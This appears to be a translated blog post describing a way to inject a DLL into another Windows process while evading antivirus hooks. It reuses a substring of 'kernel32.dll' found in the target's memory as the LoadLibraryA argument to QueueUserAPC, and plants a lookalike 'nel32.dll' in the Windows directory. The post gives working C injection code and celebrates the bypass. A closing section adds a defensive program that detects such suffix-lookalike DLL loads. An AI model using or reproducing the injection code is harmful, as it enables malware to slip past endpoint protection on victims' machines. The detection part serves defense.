Thoughts on a code-injection method that bypasses active defense

Most AV products place hooks on NtWriteVirtualMemory and on NtUserSetWindowsHookAW / NtUserSetWindowsHookEx to block code injection.

The Ring3 (user-mode) code-injection methods include:

- remote thread: CreateRemoteThread

- message hook: SetWindowsHookEx

- Ring3 APC: QueueUserAPC

- modifying a thread's context: SetThreadContext

The first and third approaches (CreateRemoteThread and QueueUserAPC) need a parameter, and that parameter must live in the target process's address space. Earlier methods handled this clumsily: allocate memory in the target with VirtualAllocEx, then write the parameter's contents with WriteProcessMemory. WriteProcessMemory is hooked, so AV products intercept the injection with ease.

Think about it: this defense is very easy to defeat! The reason is that to obtain a parameter, the attacker does not need to make such a drastic move as allocating memory in the target process and writing to it. What if WriteProcessMemory is never called? My aim is only to get a reasonable parameter, and that parameter only has to lie somewhere in the target process's address space!

After thinking it over, everything turned out to be so easy, haha! I laughed for a long time ~~~

For example, suppose I inject with:

QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param);

I want param to point to the string "xxx.dll", that is all, and param must be inside the target process's address space.

Have you thought of it yet? Haha

The answer: search the target process directly for a string like "nel32.dll"! The string "kernel32.dll" is certain to exist in the target. "kernel32.dll" itself cannot be used as the name, but a suffix of it such as "nel32.dll" or "el32.dll" can, because a pointer into the middle of that string is still a NUL-terminated string. Finally, drop a nel32.dll into the Windows directory, and most AV products will not intercept the injection! Haha!

I wrote a small program and ran a test; it was only a quick trial, but the bypass worked perfectly. Testing against actual AV products will come later...

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Thread-id list node. The post uses TIDLIST without showing its definition,
// so this layout is assumed from the two fields the code accesses.
typedef struct _TIDLIST
{
    DWORD dwTid;
    struct _TIDLIST *pNext;
} TIDLIST;

DWORD EnumThreadandInjectDll(char *processName, HANDLE hProcess, DWORD dwProcessId, TIDLIST *pThreadIdList)
{
    TIDLIST *pCurrentTid = pThreadIdList;

    const char szInjectModName[] = "nel32.dll";
    DWORD dwLen = (DWORD)strlen(szInjectModName);

    //////////////////////////////////////////////////////////////////////////
    // Do not write to the target process's memory.
    // Instead, search the target process for a string like "nel32.dll" and
    // pass its address as the LoadLibraryA parameter.
    //////////////////////////////////////////////////////////////////////////
    int bufflen = 30000;
    char *buffer = (char *)malloc(sizeof(char) * bufflen);
    DWORD dwNumberOfBytesRead = 0;
    DWORD defaultAddress = 0;   // 32-bit build assumed, as in the original

    // Get the base address of the process's main module
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessId);
    if (hSnapshot == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot error!\n");
        free(buffer);
        return 0;
    }
    MODULEENTRY32 me = { sizeof(me) };
    BOOL fOk = Module32First(hSnapshot, &me);
    if (!fOk)
    {
        printf("Module32First error!\n");
        CloseHandle(hSnapshot);
        free(buffer);
        return 0;
    }
    for (; fOk; fOk = Module32Next(hSnapshot, &me))
    {
        printf("%s process module name = %s\n", processName, me.szModule);
        // Take the base address of the main module (its name matches the process name)
        if (stricmp(me.szModule, processName) == 0)
        {
            defaultAddress = (DWORD)me.modBaseAddr;
            printf("%s process module base = 0x%08X\n", processName, defaultAddress);
            break;
        }
    }
    CloseHandle(hSnapshot);
    if (defaultAddress == 0)
    {
        printf("main module of %s not found!\n", processName);
        free(buffer);
        return 0;
    }

    // Search the first bufflen bytes of the main module for the string
    if (!ReadProcessMemory(hProcess, (LPCVOID)defaultAddress, buffer, bufflen, &dwNumberOfBytesRead))
    {
        printf("ReadProcessMemory error!\n");
        free(buffer);
        return 0;
    }

    for (DWORD i = 0; i + dwLen <= dwNumberOfBytesRead; i++)
    {
        if (strnicmp(buffer + i, szInjectModName, dwLen) == 0)
        {
            printf("found nel32.dll already!... %.*s\n", (int)dwLen, buffer + i);
            while (pCurrentTid)
            {
                HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid);

                if (hThread != NULL)
                {
                    //
                    // Inject the DLL into the target process: the APC parameter
                    // points at the string found inside the target's own memory
                    //
                    QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress + i));
                    CloseHandle(hThread);
                }

                printf("TID:%d\n", pCurrentTid->dwTid);
                pCurrentTid = pCurrentTid->pNext;
            }
            break;
        }
    }

    free(buffer);
    return 0;
}
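From the defender's side, the tell in this technique is the artifact it has to leave behind: a DLL whose file name is a proper suffix of a legitimate system DLL (nel32.dll for kernel32.dll) being loaded from the Windows directory. The following C program is an added example, not code from the original post: it applies that suffix-lookalike heuristic to a constructed set of image-load records of the kind an image-load telemetry source (for instance Sysmon Event ID 7) produces. The list of known system DLL names is a constructed stand-in for a real inventory of the Windows directory, and the sample records are constructed too.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for an inventory of legitimate system DLL names. */
static const char *const KNOWN_SYSTEM_DLLS[] = {
    "kernel32.dll", "kernelbase.dll", "ntdll.dll", "user32.dll",
    "advapi32.dll", "ole32.dll", "shell32.dll", "ws2_32.dll",
};
#define KNOWN_COUNT (sizeof KNOWN_SYSTEM_DLLS / sizeof KNOWN_SYSTEM_DLLS[0])

/* Case-insensitive comparison of n bytes; Win32 module names are case-insensitive. */
static int ieq(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* File-name component of a Windows path (text after the last '\' or '/'). */
static const char *basename_win(const char *path)
{
    const char *p = strrchr(path, '\\');
    const char *q = strrchr(path, '/');
    if (!p || (q && q > p))
        p = q;
    return p ? p + 1 : path;
}

static int is_known(const char *name, size_t n)
{
    for (size_t k = 0; k < KNOWN_COUNT; k++)
        if (strlen(KNOWN_SYSTEM_DLLS[k]) == n && ieq(KNOWN_SYSTEM_DLLS[k], name, n))
            return 1;
    return 0;
}

/* If name is a strict, case-insensitive suffix of a known system DLL name
 * (longer than the ".dll" extension alone, and not itself a known name),
 * return the DLL it imitates; otherwise return NULL. */
const char *suffix_lookalike(const char *name)
{
    size_t n = strlen(name);
    if (n <= 4 || is_known(name, n))
        return NULL;
    for (size_t k = 0; k < KNOWN_COUNT; k++) {
        size_t m = strlen(KNOWN_SYSTEM_DLLS[k]);
        if (n < m && ieq(KNOWN_SYSTEM_DLLS[k] + (m - n), name, n))
            return KNOWN_SYSTEM_DLLS[k];
    }
    return NULL;
}

/* 1 if the loaded image's file name is a suffix lookalike, else 0. */
int flag_image_load(const char *image_path)
{
    return suffix_lookalike(basename_win(image_path)) != NULL;
}

/* Constructed image-load records: "<process> <image path>". The nel32.dll
 * line is the constructed positive case, placed in the Windows directory as
 * the post describes. */
static const char *const SAMPLE_LOADS[] = {
    "notepad.exe C:\\Windows\\System32\\kernel32.dll",
    "notepad.exe C:\\Windows\\System32\\user32.dll",
    "notepad.exe C:\\Windows\\nel32.dll",
    "explorer.exe C:\\Windows\\System32\\shell32.dll",
};

/* Scan the sample records, print an alert for each hit, return the hit count. */
int scan_sample_loads(void)
{
    int flagged = 0;
    for (size_t i = 0; i < sizeof SAMPLE_LOADS / sizeof SAMPLE_LOADS[0]; i++) {
        const char *line = SAMPLE_LOADS[i];
        const char *sp = strchr(line, ' ');
        const char *image = sp ? sp + 1 : line;
        const char *hit = suffix_lookalike(basename_win(image));
        if (hit) {
            printf("ALERT: %.*s loaded %s, whose name is a suffix of %s\n",
                   sp ? (int)(sp - line) : 0, line, image, hit);
            flagged++;
        }
    }
    return flagged;
}

int main(void)
{
    printf("%d suspicious image load(s)\n", scan_sample_loads());
    return 0;
}
```

The heuristic is cheap and has a low false-positive rate because legitimate DLL names are rarely strict suffixes of one another; in production the known-name list would come from the actual contents of System32, and a hit should be joined with the loading process's other events (the APC-queueing process, the DLL's signature and creation time) before raising an incident.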


Source: www.cnblogs.com/mayingkun/p/11933920.html